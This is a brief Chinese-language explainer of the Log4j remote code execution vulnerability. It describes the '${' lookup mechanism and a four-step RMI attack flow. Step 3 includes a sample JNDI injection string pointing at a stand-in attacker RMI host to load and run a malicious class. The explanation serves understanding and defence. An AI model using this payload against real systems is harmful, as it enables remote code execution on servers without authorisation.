log4j远程代码执行漏洞

原理：

Log4j 是Apache 的一个开源项目，是一款基于Java 的开源日志记录工具。该漏洞主要是由于日志在打印时当遇到`${`后，以:号作为分割，将表达式内容分割成两部分，前面一部分prefix，后面部分作为key，然后通过prefix去找对应的lookup，通过对应的lookup实例调用lookup方法，最后将key作为参数带入执行，引发远程代码执行漏洞。

具体操作：

在正常的log处理过程中对**${**这两个紧邻的字符做了检测，一旦匹配到类似于表达式结构的字符串就会触发替换机制，将表达式的内容替换为表达式解析后的内容，而不是表达式本身，从而导致攻击者构造符合要求的表达式供系统执行

以RMI为例，简单阐述下该漏洞的攻击原理：

1、攻击者首先发布一个RMI服务，此服务将绑定一个引用类型的RMI对象。在引用对象中指定一个远程的含有恶意代码的类。

2、攻击者再发布另一个恶意代码下载服务，此服务可以下载所有含有恶意代码的类。

3、攻击者利用Log4j2的漏洞注入RMI调用，例如：log.info(“登录成功”, “${jndi:rmi://rmi-service:1188/hackedclass}”);

4、调用RMI后将获取到引用类型的RMI远程对象，该对象将就加载恶意代码并执行。